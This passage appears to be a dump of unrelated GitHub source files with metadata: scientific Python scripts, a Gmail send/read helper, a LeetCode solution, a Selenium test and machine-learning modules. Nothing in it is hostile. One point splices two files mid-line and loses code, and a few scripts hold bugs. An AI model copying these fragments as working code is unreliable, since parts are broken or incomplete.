= len(random_lorentzian[abs(random_lorentzian)>1000])) \n \n random_lorentzian_trunc = cauchy.rvs(loc=0, scale=gamma, size=len(data))\n while len(random_lorentzian_trunc[(abs(random_lorentzian_trunc)>maxdv)])>0:\n random_lorentzian_trunc[abs(random_lorentzian_trunc)>maxdv] = cauchy.rvs(loc=0, scale=gamma, size = len(random_lorentzian_trunc[(abs(random_lorentzian_trunc)>maxdv)])) \n \n random_gaussian = np.random.normal(loc=0,scale = sigma,size = len(data))\n random_stdev = np.random.normal(loc=0,scale = stdev,size = len(data))\n \n random_data = sampling(len(data))\n vsmear = []\n \n if index == 0:\n fig,ax = plt.subplots(ncols=2,nrows=1,figsize=(12, 5),sharey=True)\n den,BINS = np.histogram(dv, bins=bins)#, histtype='step',label='data')\n ax[0].plot(BIN,den/norm,'k',label='data')\n dens,BINS = np.histogram(random_data, bins=bins)#, histtype='step',label='data')\n ax[0].plot(BIN,dens/len(data),'r--',label='sampled data')\n # Lorentzian related random array\n dens,BINS = np.histogram(random_lorentzian, bins=bins)#, histtype='step',label='lorentzian')\n ax[0].plot(BIN,dens/len(random_lorentzian),'b',label='Lorentzian')\n\n # Gaussian related random array\n ax[1].plot(BIN,den/norm,'k',label='data')\n dens,BINS = np.histogram(random_lorentzian_trunc, bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_lorentzian_trunc),'b',label='truncated Lorentzian') \n dens,BINS = np.histogram(random_gaussian, bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_gaussian),'r',label='Gaussian')\n dens,BINS = np.histogram(random_stdev, bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_stdev),'orange',label='Gaussian(stdev)')\n\n ax[0].set_ylabel('normalised counts')\n for i in range(2):\n ax[i].set_xlim(-maxdv-5,maxdv+5)\n ax[i].set_xlabel('$\\Delta$ v (km/s)')\n ax[i].set_ylim(0,1.8*max(den)/norm)\n ax[i].grid(True)\n ax[i].legend(loc=2)\n plt.savefig('{}_distribution_{}_maxdv{}.png'.format(TYPE,zrange,maxdv))\n plt.close()\n else:\n print('generating Vsmeared peculier velocities:',index)\n\n # save the random arrays\n \"\"\"\n for k,randoms in enumerate([random_lorentzian,random_gaussian,random_stdev,random_lorentzian_trunc,random_data]):\n vsmear.append((data[:,-1]+(randoms*(1+z)/H)%boxsize)%boxsize)\n np.savetxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index),np.hstack((data,np.array(vsmear).T)))\n \n ## add the data-like distribution later\n vsmear = np.loadtxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index))\n vsmear_data = (data[:,-1]+(random_data*(1+z)/H)%boxsize)%boxsize\n np.savetxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index),np.hstack((vsmear,vsmear_data.reshape(len(data),1))))\n \"\"\"\nelif task == 'lorentzian_random':\n # test: histogram of the random samples agrees with the observations\n from scipy.stats import cauchy\n fig,ax = plt.subplots(ncols=2,nrows=2,figsize=(12, 10))\n for i in range(2):\n if i==0:\n rand = cauchy.rvs(loc=0, scale=popt1[1]/2, size=int(5e5))#int(len(dv)))\n numS,binS = np.histogram(rand,bins =bins)#,density=True)\n label = 'simulated without extra samples'\n else:\n rand = cauchy.rvs(loc=0, scale=popt1[1]/2, size=int(6e5))#int(len(dv)*1.1))\n numS,binS = np.histogram(rand,bins =bins)#,density=True)\n label = 'simulated with extra samples'\n\n for j in range(2):\n ax[i,j].plot(BIN,numS/len(rand),'r--',label=label)\n #dens,BINS,plot = ax[i,j].hist(dv, bins=bins, histtype='step',label='data')\n dens,BINS = np.histogram(dv, bins=bins)#, 
histtype='step',label='data')\n ax[i,j].plot(BIN,dens/norm,'k',label='data')\n ax[i,j].plot(BIN,lorentzian(BIN,popt1[0]/norm,popt1[1],popt1[2]),label='analitical')\n ax[i,j].set_xlabel('$\\Delta$ v')\n ax[i,j].set_ylabel('counts')\n if j==0:\n ax[i,j].legend(loc=0,fontsize=10)\n ax[i,j].set_ylim(0,1.8*max(dens)/norm)\n if j ==1:\n ax[i,j].set_yscale('log')\n ax[i,j].set_ylim(10/norm,1.8*max(dens)/norm)\n\n plt.savefig('lorentzian_distribution.png')\n plt.close()\n\nelif task == 'voigt_random':\n # test pesudo-voigt distribution: have difficulty in normalisation\n # len(dv) is the normalisation of the standard voigt\n Nsample = int(5.5e5)\n x = []\n simu = []\n samples = []\n cQ = 1/len(BIN)*5\n #popt2, pcov21 = curve_fit(pvoigt,BIN,dens/norm,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #import pdb;pdb.set_trace()\n\n for i in range(Nsample):\n random = np.random.uniform(low=-maxdv,high=maxdv)\n value = np.interp(random,BIN,dens/norm)\n #value = 10*pvoigt(random,popt2[3]*np.pi*popt2[1],popt2[1],popt2[2],popt2[3])\n #import pdb;pdb.set_trace()\n sample = np.random.uniform(0,cQ)\n if sampleHtml Email\"\n msgPlain = \"Hi\\nPlain Email\"\n SendMessage(sender, to, subject, msgHtml, msgPlain)\n # Send message with attachment: \n SendMessage(sender, to, subject, msgHtml, msgPlain, '/path/to/file.pdf')\n\ndef read_msg(user_email):\n credentials = get_credentials(user_email)\n\n service = build('gmail', 'v1',credentials=credentials)\n\n # request a list of all the messages\n result = service.users().messages().list(userId='me',maxResults=5).execute()\n print ('result ', result)\n # We can also pass maxResults to get any number of emails. Like this:\n # result = service.users().messages().list(maxResults=200, userId='me').execute()\n messages = result.get('messages')\n contents = []\n for msg in messages:\n # Get the message from its id\n txt = service.users().messages().get(userId='me', id=msg['id']).execute()\n print (txt)\n # Use try-except to avoid any Errors\n try:\n # Get value of 'payload' from dictionary 'txt'\n payload = txt['payload']\n headers = payload['headers']\n # print (payload)\n\n # Look for Subject and Sender Email in the headers\n for d in headers:\n if d['name'] == 'Subject':\n subject = d['value'] \n # print (subject)\n if d['name'] == 'From':\n sender = d['value']\n \n # The Body of the message is in Encrypted format. So, we have to decode it.\n # Get the data and decode it with base 64 decoder.\n parts = payload.get('parts')[0]\n # print (parts)\n data = parts['body']['data']\n data = data.replace(\"-\",\"+\").replace(\"_\",\"/\")\n decoded_data = base64.b64decode(data)\n # print (decoded_data)\n \n # Now, the data obtained is in lxml. 
So, we will parse \n # it with BeautifulSoup library\n soup = BeautifulSoup(decoded_data)\n # print (soup)\n # body = soup.body()\n # print (body)\n body = soup.decode_contents()\n \n # Printing the subject, sender's email and message\n # print(\"Subject: \", subject)\n print(\"From: \", sender)\n # print(\"Message: \", soup.decode_contents())\n # print('\\n')\n info = {\n \"sender\": sender,\n \"subject\": subject,\n \"body\": body\n }\n contents.append(info)\n \n except:\n\n pass\n return (contents )\n\n \n\nif __name__ == '__main__':\n read_msg('rmrsriram@gmail.com')","repo_name":"Ram3077/Ram3077","sub_path":"app_Sep24/writemail.py","file_name":"writemail.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"27236014269","text":"# coding=utf-8\n\nfrom typing import List\n\n# @solution-sync:begin\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n a_i = 1\n b_i = 0\n while b_i < len(nums)-1:\n if nums[b_i] != nums[b_i + 1]:\n nums[a_i] = nums[b_i + 1]\n a_i = a_i+1\n b_i = b_i+1\n return a_i\n# 双指针\n# 指针一为判断数组内相邻数据是否相同,此为是否移动指针二的必要判断条件 while 循环实现,单层循环实现\n# 指针二为变更数组内容的指针,该指针主要在满足条件的时候进行数据变更\n# @solution-sync:end\n\n\nif __name__ == '__main__':\n nums = [1, 1, 2]\n\n result = Solution().removeDuplicates(nums)\n print(result)\n","repo_name":"hereTac/ax","sub_path":"leetcode/array/删除有序数组中的重复项.py","file_name":"删除有序数组中的重复项.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29568427187","text":"# some basic python imports \nimport msmexplorer as msme\nimport numpy as np\nget_ipython().run_line_magic('pylab', 'inline')\nimport seaborn as sns \nsns.set_style(\"whitegrid\")\nsns.color_palette(\"colorblind\")\nsns.set_context(\"poster\",1.3)\nimport mdtraj as md\nfrom msmbuilder.utils import load,dump\n\nloc = \"./data/\"\n\nall_atom_trj = md.load(\"%s/0.pdb\"%loc)\n\nall_atom_f = load(\"./data/all_atom_featurizer.pkl\")\nall_atom_df = load(\"./data/all_atom_feature_descriptor.pkl\")\n\nall_atom_df.head(10)\n\nnrm = load(\"./data/nrm.pkl\")\n\nfrom sklearn.svm import SVC\nimport os\n\ntrain=False \nif not os.path.isfile(\"./data//svm_model.pkl\"):\n clf = SVC(kernel=\"linear\")\n train =True \nelse:\n clf = load(\"./data/svm_model.pkl\")\n train =False\n\n# Unfortunately, we can't provide the actual features but the trainging for these models is the same as alanine \n# except we now use a second transform \n\n# here basin_!.hdf5 is the trajectory from the unfolded state, and basin_2.hdf5 is the trajecotory from the folded state\n\n# t1 = md.load(\"./basin_1.hdf5\")\n# t2 = md.load(\"./basin_2.hdf5\")\n\n# features = all_atom_f.fit_transform([t1,t2])\n# nrm_features = nrm.fit_transform(np.concatenate(features))\n\n# train_X=np.vstack(nrm_features)\n\n# train_Y=np.concatenate([np.zeros(1000),\n# np.ones(1000)])\n# if train:\n# clf.fit(train_X, train_Y)\n# else:\n# pass\n\n\n\nall_atom_df.iloc[np.argsort(np.abs(clf.coef_))[0]]\n\nclr_plt = sns.color_palette(\"colorblind\")\nplot(clf.coef_.T,marker='o',c=clr_plt[2])\nvlines(14,-.15,0.15,linestyles='dashed')\nvlines(50,-.15,0.15,linestyles='dashed')\nylim([-.15,0.15])\nxlabel(\"Feature Index\")\nylabel(r'SVM coefficient')\n\n# in these train_x is from above\n# b=clf.decision_function(train_X)/np.linalg.norm(clf.coef_)\n# np.std(b[1000:])\n\nplot(b[:1000],label=\"Unfolded state\",c=clr_plt[0])\nplot(b[1000:],label=\"Folded 
\nfrom tica_metadynamics.pyplumed import render_df\nfrom tica_metadynamics.pyplumed import render_meta \nfrom jinja2 import Template\nfrom sklearn.utils.validation import check_is_fitted\n\nplumed_matheval_template = Template(\"MATHEVAL ARG={{arg}} FUNC={{func}} LABEL={{label}} PERIODIC={{periodic}} \")\n\nplumed_combine_template = Template(\"COMBINE LABEL={{label}} ARG={{arg}} COEFFICIENTS={{coefficients}} \"+ \"PERIODIC={{periodic}} \")\ndef render_svm(clf=None, input_prefix=\"f0\", output_prefix=\"l\"):\n    if clf is None:\n        raise ValueError(\"Need a fitted Sklearn SVM object\")\n    # raises NotFittedError if the model has not been fit yet\n    check_is_fitted(clf, attributes=[\"coef_\",\"intercept_\"])\n    n_args = clf.coef_.shape[1]\n    output = []\n    arg_list=\",\".join([\"%s_%d\"%(input_prefix,i) for i in range(n_args)])\n    coeff = \",\".join([str(i) for i in clf.coef_[0]])\n    w_norm = np.linalg.norm(clf.coef_)\n\n    output.append(plumed_combine_template.render(label=\"%s_0\"%output_prefix,\n                                                 arg=arg_list,\n                                                 coefficients=coeff,\n                                                 periodic=\"NO\")+\"\\n\")\n\n    func=\"(x+%s)/%s\"%(str(clf.intercept_[0]),str(w_norm))\n\n    output.append(plumed_matheval_template.render(label=\"%s_1\"%output_prefix,\n                                                  arg=\"l_0\",\n                                                  func=func,\n                                                  periodic=\"NO\")+\"\\n\")\n\n    return ''.join(output)\n    \n    \n\ntotal_out=[]\ntotal_out.extend(\"RESTART\\n\")\ntotal_out.extend(render_df(all_atom_df,nrm=nrm))\ntotal_out.extend(render_svm(clf))\ntotal_out.extend(render_meta.render_metad_code(\"l_1\",biasfactor=6,sigma=0.25))\ntotal_out.extend(render_meta.render_metad_bias_print(\"l_1,metad.bias\"))\n\nprint(\"\".join(total_out))\n\n# We can now analyze the multiple walker simulations in different ways\n\n# for example, we can concatenate all trajectories and load the bias for each frame in that single long traj\n\n\n\nloc = \"./data/reweight/\"\ntest_traj = md.load(\"%s/all_traj.xtc\"%loc,top=\"%s/top.pdb\"%loc)\nbias = np.loadtxt(\"%s/BIAS\"%loc)\n#bias = np.loadtxt(\"./reweight2/reweight//BIAS\")\n#bias = np.loadtxt(\"./reweight//BIAS\")\n\ntest_X = nrm.transform(all_atom_f.transform([test_traj])[0])\nsklearn_out = clf.decision_function(test_X)/np.linalg.norm(clf.coef_)\n\n\nplot(sklearn_out, label=\"ALL WALKERS\")\nlegend()\n\nplot(sklearn_out,bias[:,1])\nxlabel(\"SKLearn Values\")\nylabel(\"Plumed Values\")\n\nclr_plt = sns.color_palette(\"colorblind\")\nax,data=msme.plot_free_energy(bias,obs=[1],n_samples=50000,pi=np.exp(bias[:,-1]/2.83),\n                  cmap='viridis',gridsize=400,return_data=True,shade=False,color=clr_plt[5])\nax.set_ylim([0,3])\nxlabel(r'$SVM_{cv}$'+\"\\nUnfolded to Folded\")\nylabel(\"Free Energy (kcal/mol)\")\n\n# Or simply sum up the hills\n\nfes = np.loadtxt(\"./%s/fes.dat\"%loc)\n\nplot(fes[:,0],(fes[:,1]-fes[:,1].min())/4.18,c=clr_plt[5])\nylim([0,4])\nxlabel(r'$SVM_{cv}$'+\"\\nUnfolded to Folded\")\nylabel(\"Free Energy (kcal/mol)\")\n\nfolded_pdb = md.load_pdb(\"https://files.rcsb.org/view/2RVD.pdb\")\n\nfolded_pdb_decision_func = clf.decision_function(np.concatenate([nrm.transform(i) for i in all_atom_f.transform(folded_pdb)])) /np.linalg.norm(clf.coef_)\n\nfolded_pdb_decision_func\n\nca_traj = test_traj.atom_slice([i.index for i in test_traj.top.atoms if i.name=='CA'])\nca_folded_pdb= folded_pdb.atom_slice([i.index for i in folded_pdb.top.atoms if i.name=='CA'])\n\nrmsd_data = md.rmsd(ca_traj,ca_folded_pdb)\nplot(rmsd_data,label=\"ALL WALKERS\")\nlegend()\nxlabel(\"Time 
(ns)\")\nxticks([0,10000,20000,30000,40000,50000,60000],np.array([0,10000,20000,30000,40000,50000,60000])/2)\nylabel(\"RMSD to folded (nm)\")\n\nrmsd_dict={}\nfor walker_index in range(25):\n test_traj = md.load(\"%s/walker_%d.xtc\"%(loc,walker_index),top=\"%s/top.pdb\"%loc)\n ca_traj = test_traj.atom_slice([i.index for i in test_traj.top.atoms if i.name=='CA'])\n ca_folded_pdb= folded_pdb.atom_slice([i.index for i in folded_pdb.top.atoms if i.name=='CA'])\n rmsd_data = md.rmsd(ca_traj,ca_folded_pdb)\n rmsd_dict[walker_index] = rmsd_data\n\n# quick hack to find interesting trajectories \n\nnp.argsort([np.median(rmsd_dict[i]) for i in range(25)])\n\nfor i in [24,10,14,15,8]:\n plot(rmsd_dict[i])\n\nwalker_index = 24\ntest_traj = md.load(\"%s/walker_%d.xtc\"%(loc,walker_index),top=\"%s/top.pdb\"%loc)\ntest_X = nrm.transform(all_atom_f.transform([test_traj])[0])\nsklearn_out = clf.decision_function(test_X)/np.linalg.norm(clf.coef_)\n\nsubplot(2,1,1)\nplot(sklearn_out[:600],c=clr_plt[1],label=\"Walker 25 (of 25)\")\nylabel(r'$SVM_{cv}$')\nlegend()\nxticks([0,200,400,600],[])\nylim([-12,9])\nsubplot(2,1,2)\nplot(rmsd_dict[24][:600],c=clr_plt[5],label=\"Walker 25 (of 25)\")\nlegend()\nxticks([0,200,400,600],[0,10,20,30])\nxlabel(\"Metdynamics simulation time (ns)\")\nylabel(\"RMSD(nm) to folded\")\n# vlines(585,0.1,0.8,linestyles='dotted')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/svm_chignolin.py","file_name":"svm_chignolin.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22670271727","text":"'''RestlessArm: an arm whose states evolve based on an underlying MDP\n'''\nfrom typing import Callable\nimport logging\nimport numpy as np\n\nfrom src.Arms.Arm import Arm\n\nclass RestlessArm(Arm):\n '''RestlessArm: an arm whose states evolve based on an underlying MDP\n '''\n def __init__(self, \n id: int, \n transition_matrix: np.ndarray,\n seed: int = 0, \n initial_state: int = 1,\n n_states: int = None, \n n_actions: int = None,\n rho: Callable = lambda b: b, \n r: Callable = None, \n error_log: logging.Logger = logging.getLogger('error_log'),\n verbose: bool = False, \n **kwargs):\n '''\n Init a RestlessArm, which transitions states according to the MDP transition_matrix\n \n :param id: ID of the arm\n :param transition_matrix: (n_actions x n_states x n_states) np.ndarray\n :param seed: seeds the rng, default 0\n :param initial_state: initial state of the arm, defaults to 1. 
If -1, random\n :param n_states: int number of states, default 2\n :param n_actions: int number of actions, default 2\n :param rho: Callable, optional local reward rho(b) function for WhittleIndexPolicy\n :param r: Callable, optional local reward r(s) function for computing local reward\n :param error_log: error log, defaults to logging.getLogger('error_log')\n :param verbose: flag for extra prints to the console, defaults to False\n :param **kwargs: optional kwargs, passed into Arm\n\n '''\n \n # Transition matrix is a required kwarg, has a required shape:\n assert(len(transition_matrix.shape)==3)\n assert(transition_matrix.shape[1]==transition_matrix.shape[2])\n if n_states is None:\n n_states = transition_matrix.shape[1]\n else:\n assert(n_states == transition_matrix.shape[1])\n if n_actions is None:\n n_actions = transition_matrix.shape[0]\n else:\n assert(n_actions == transition_matrix.shape[0])\n \n # Initialize general arm properties\n Arm.__init__(self, id=id, error_log=error_log, verbose=verbose, **kwargs)\n self.transition = transition_matrix\n self.n_states = n_states\n self.n_actions = n_actions\n self.initial_state = initial_state\n self.reset(seed=seed, initial_state=initial_state)\n \n # Initialize reward function properties\n self.rho = rho # rho(b) is used to calculate Whittle index\n if r is None:\n self.r = rho # r(s) is used to calculate local reward\n else: \n self.r = r\n\n def reset(self, seed: int, initial_state: int = None):\n '''\n Resets in place:\n self.rng\n self.actions\n self.state\n self.belief\n self.last_known_state\n self.time_since_pulled\n self.belief_chains\n \n :param seed: seed for the rng Generator\n :param initial_state: int initial states, defaults to self.initial_state\n \n Simulations should pass in a seed to standardize transitions.\n '''\n \n self.rng = np.random.default_rng(seed)\n \n self.actions = []\n \n if initial_state is None:\n initial_state = self.initial_state\n \n if initial_state == -1:\n self.state = [self.rng.integers(self.n_states)]\n else: \n self.state = [initial_state]\n \n self.belief = self.state.copy()\n \n self.last_known_state = 1 # Used for whittle index computation\n self.time_since_pulled = 1 # Time since pulled = # of days since the arm was last pulled. If pulled in t, it gets updated to = 1 at t+1.\n\n # gets initialized/computed when WhittleIndex policy is called\n self.belief_chains = None\n \n def compute_next_belief(self, action: int):\n '''\n Belief is recursive. Given the previous belief and the action computed, return the next belief.\n \n :param action: int in arange(n_actions)\n :return: the next belief given action\n\n '''\n return self.belief[-1] * self.transition[action, 1, 1] + \\\n (1 - self.belief[-1]) * self.transition[action, 0, 1]\n \n def _update_true_state(self, action: int):\n '''\n Updates (appends) in place:\n the (true) self.state of the arm based on the action\n self.actions\n Must be called before self._update_belief_state. See self.update()\n \n :param action: int in arange(n_actions)\n \n The action at index t represents the action taken when going from state t to t+1\n e.g. 
actions[1] is the action that moves state[1] to state[2]\n '''\n self.actions.append(action)\n\n # This update applies to Restless AND Collapsing arms\n if action == 0:\n self.time_since_pulled +=1\n else:\n self.time_since_pulled = 1\n \n outcome = self.rng.random()\n if outcome <= self.transition[action, self.state[-1], 0]: \n self.state.append(0)\n else:\n self.state.append(1)\n\n if type(self).__name__ == \"RestlessArm\":\n self.last_known_state = self.state[-1]\n # Collapsing arm's \"last_known_state\" gets in self._update_belief_state()\n return\n\n\n def _update_belief_state(self):\n '''\n Updates (appends) in place:\n self.belief with self.state\n Must be called after self._update_true_state(), see self.update()\n\n '''\n if len(self.belief) != len(self.state) - 1:\n raise ValueError('Ensure self._update_true_state() has been called first')\n self.belief.append(self.state[-1])\n\n def update(self, action: int):\n '''\n Updates self.arm when action is taken\n \n :param action: int in arange(n_actions)\n\n '''\n self._update_true_state(action=action)\n self._update_belief_state()\n\n def compute_rho(self, t: int):\n '''\n Calculate local reward of belief, rho(b), at t\n \n :param t: int timestep \n :return: rho(b_t), float\n\n '''\n return self.rho(self.belief[t])\n \n def compute_r(self, t: int):\n '''\n Calculate local reward of true state, r(s), at t\n \n :param t: int timestep\n :return: r(s_t), float\n\n '''\n return self.r(self.state[t])\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"crherlihy/prob_fair_rmab","sub_path":"src/Arms/RestlessArm.py","file_name":"RestlessArm.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"3516635298","text":"import time\nimport unittest\n\nfrom frameworkutils.browserbase import BrowerBase\nfrom pageobjects.functions.desk import Desk\nfrom pageobjects.functions.loginPage import Login\n\nfrom pageobjects.functions.recruitment import Recruitment\n\n\nclass Test_Recruitment(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n browser = BrowerBase(cls)\n cls.driver = browser.open_browser(cls)\n # browser.login_success()\n\n @classmethod\n def tearDownClass(cls):\n # cls.driver.quit()\n print(\"结束\")\n\n#手机登录系统\n def test_1login_success(self):\n loginpage = Login(self.driver)\n loginpage.click_cell_login()\n loginpage.type_cellphone()\n loginpage.click_next()\n loginpage.type_pwd()\n loginpage.click_login_button()\n if loginpage.is_exist_element(loginpage.close_news):\n loginpage.click_close_news()\n self.assertIsNotNone(loginpage.login_success_ico)\n time.sleep(2)\n#进去招聘页面\n def test_2recruitment(self):\n deskpage = Desk(self.driver)\n time.sleep(2)\n deskpage.click_recruitment_menu()\n time.sleep(2)\n self.assertIsNotNone(deskpage.anpaimainshi)\n\n#新建招聘职位\n @unittest.skipIf(True,u\"为True的时候跳过\")\n def test_3new_job_position(self):\n jobpositionpage=Recruitment(self.driver)\n jobpositionpage.click_job_position_menu()\n jobpositionpage.click_add_position_button()\n jobpositionpage.input_job_name()\n time.sleep(2)\n jobpositionpage.click_job_save_button()\n\n#新建候选人\n def test_3candidatelist(self):\n jobpositionpage = Recruitment(self.driver)\n jobpositionpage.click_candidate_list_menu()\n jobpositionpage.choose_add_candidate()\n se=jobpositionpage.job_selection\n jobpositionpage.choose_job()\n jobpositionpage.input_candidate_name()\n jobpositionpage.input_cellphone()\n jobpositionpage.click_save()\n 
self.driver.execute_script()\n\n\n\n\n","repo_name":"Evading77/autoTestCode","sub_path":"AutoCode/Code/2haoTestCode/testsuites/test_recruitment.py","file_name":"test_recruitment.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73365082989","text":"import math\r\ndef isperfect(n):\r\n num=int(math.sqrt(n))\r\n return (num*num)==n\r\n\r\nt=int(input())\r\nfor i in range(t):\r\n print(\"Case #\"+str(i+1)+\": \",end=\"\")\r\n inputs=list(map(int,input().split()))\r\n A=list(map(int,input().split()))\r\n alphabets=set()\r\n alphaorder=list()\r\n # if n==1:\r\n # print(\"AB\")\r\n # continue\r\n j=0\r\n n=len(A)-1\r\n while(j=0):\r\n alphaorder.insert(0,A[temp]//n)\r\n alphabets.add(A[temp]//n)\r\n n=A[temp]//n\r\n temp-=1\r\n n=len(A)\r\n temp=j+1\r\n while(temp span_drop or span_drop > 1:\n raise ValueError(\"span_drop valid range is [0,1)\")\n elif span_drop == 1:\n return [], []\n start_indexes = []\n end_indexes = []\n hypothesis_start_index = 1 + premise_len + 1\n hypothesis_end_index = hypothesis_start_index + hypothesis_len\n premise_step = calculate_step(premise_len, span_drop, max_spans)\n hypothesis_step = calculate_step(hypothesis_len, span_drop, max_spans)\n\n for i in range(1, premise_len + 1, premise_step):\n for j in range(i, premise_len + 1, premise_step):\n start_indexes.append(i)\n end_indexes.append(j)\n\n for i in range(hypothesis_start_index, hypothesis_end_index, hypothesis_step):\n for j in range(i, hypothesis_end_index, hypothesis_step):\n start_indexes.append(i)\n end_indexes.append(j)\n\n return start_indexes, end_indexes\n\n\ndef padd_and_and_collect(data, max_data_len, padding_token_id):\n data_tensor = torch.full([len(data), max_data_len],\n fill_value=padding_token_id,\n dtype=data[0][0].dtype)\n for i, sample in enumerate(data):\n data_tensor[i][:len(sample)] = sample\n\n return data_tensor\n\n\ndef calculate_step(range_len, span_drop, max_span_size):\n if span_drop == 0:\n return 1\n\n # Arithmetic progression sum\n number_of_spans = (range_len + 1) * (range_len - 1) / 2\n wanted_number_of_spans = min(ceil(number_of_spans * (1 - span_drop)), max_span_size)\n\n if wanted_number_of_spans == 0:\n return ceil(range_len)\n else:\n return ceil(range_len / sqrt(wanted_number_of_spans))\n","repo_name":"ItayDev/nli-span-info","sub_path":"data/collate.py","file_name":"collate.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27801331058","text":"import pygame\r\nimport apple #引入apple.py\r\nimport snake #引入snake.py\r\n#宣告想使用的顏色\r\nwhite = (255,255,255)\r\n\r\n#初始化apple.py裡面的Apple類別\r\n#宣告一個變數app_obj,是Apple類別的初始化\r\napp_obj = apple.Apple()\r\n\r\n#初始化snake.py裡面的Snake類別\r\n#宣告一個變數snake_obj,是Snake類別的初始化\r\nsnake_obj = snake.Snake()\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((800,600))\r\nscreen.fill(white)\r\npygame.display.set_caption(\"貪食蛇遊戲\")\r\npygame.display.update()\r\n\r\ngameRun = True\r\ngameOver = False\r\nclock = pygame.time.Clock()\r\n\r\nwhile gameRun:\r\n clock.tick(10)\r\n for event in pygame.event.get():\r\n #事件捕捉\r\n if event.type == pygame.QUIT:\r\n gameRun = False\r\n if event.type == pygame.KEYDOWN:#按下按鈕\r\n if event.key == pygame.K_UP:#上\r\n if snake_obj.dir != \"下\":\r\n snake_obj.dir = \"上\"\r\n elif event.key == pygame.K_DOWN:#下\r\n if snake_obj.dir != \"上\":\r\n snake_obj.dir = \"下\"\r\n elif event.key == pygame.K_RIGHT:#右\r\n 
if snake_obj.dir != \"左\":\r\n snake_obj.dir = \"右\"\r\n elif event.key == pygame.K_LEFT:#左\r\n if snake_obj.dir != \"右\":\r\n snake_obj.dir = \"左\"\r\n screen.fill(white)\r\n app_obj.createApple()\r\n snake_obj.move(app_obj) #蛇移動的程式碼\r\n \r\n result = snake_obj.checkGameOver()\r\n if result == True:#GameOver後的行為\r\n gameOver = True\r\n #snake_obj = snake.Snake()\r\n\r\n #Game Over的畫面 \r\n while gameOver:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameOver = False\r\n gameRun = False\r\n if event.type == pygame.KEYDOWN:\r\n #按下ESC鍵\r\n if event.key == pygame.K_ESCAPE:\r\n gameOver = False\r\n snake_obj = snake.Snake()\r\n screen.fill((255,0,0))\r\n pygame.display.update()\r\n \r\n pygame.draw.rect(screen,\r\n (255,0,0),\r\n [app_obj.x, app_obj.y,10,10],\r\n 0)\r\n for body in snake_obj.body:\r\n pygame.draw.rect(screen,\r\n (0,0,255),\r\n [body[0], body[1],10,10],\r\n 0)\r\n \r\n pygame.display.update()\r\npygame.quit()\r\n","repo_name":"f0963217595/SnakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"43215109069","text":"from flask import render_template, jsonify, request\nfrom flask_login import login_required\n\nfrom . import bp_general\nfrom app.models import SensorReading, db\n\n\n@bp_general.route('/dashboard')\n@bp_general.route('/')\n@login_required\ndef dashboard():\n readings_value = db.session.query(SensorReading).order_by(SensorReading.id.desc()).first()\n sensor_readings = []\n # bad code\n if readings_value:\n sensor_readings = [('Температура', 'temperature', round(readings_value.temperature, 1)),\n ('Влажность', 'humidity', round(readings_value.humidity, 1)),\n ('Угарный газ', 'carbon_monoxide', int(readings_value.carbon_monoxide)),\n ('Атмосферное давление', 'atmosphere_pressure', int(readings_value.pressure))]\n \n else:\n sensor_readings = [('Температура', 'temperature', 0),\n ('Влажность', 'humidity', 0),\n ('Угарный газ', 'carbon_monoxide', 0),\n ('Атмосферное давление', 'atmosphere_pressure', 0)]\n \n\n if request.is_json:\n return jsonify({kit[1]: kit[2] for kit in sensor_readings})\n\n return render_template('general/dashboard.html', sensor_readings=sensor_readings, title='Dashboard')","repo_name":"stemirkhan/SmartSense","sub_path":"services/web/app/general/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73320764911","text":"\"\"\"\nAll the lines are forked from https://github.com/hyunwoongko/transformer\n\"\"\"\n\nimport torch\nfrom torch import nn\n\nfrom Transformer.model.encoder import Encoder\nfrom Transformer.model.decoder import Decoder\n\nclass Transformer(nn.Module):\n\n def __init__(self, src_pad_idx,\n trg_pad_idx,\n trg_sos_idx,\n enc_voc_size,\n dec_voc_size,\n d_model,\n n_head,\n max_len,\n ffn_hidden,\n n_layers,\n dropout_rate,\n device):\n super(Transformer, self).__init__()\n self.src_pad_idx = src_pad_idx\n self.trg_pad_idx = trg_pad_idx\n self.trg_sos_idx = trg_sos_idx\n self.device = device\n\n self.encoder = Encoder(enc_voc_size=enc_voc_size,\n max_len=max_len,\n d_model=d_model,\n ffn_hidden=ffn_hidden,\n n_head=n_head,\n n_layers=n_layers,\n dropout_rate=dropout_rate,\n device=device)\n\n self.decoder = Decoder(dec_voc_size=dec_voc_size,\n max_len=max_len,\n d_model=d_model,\n ffn_hidden=ffn_hidden,\n n_head=n_head,\n 
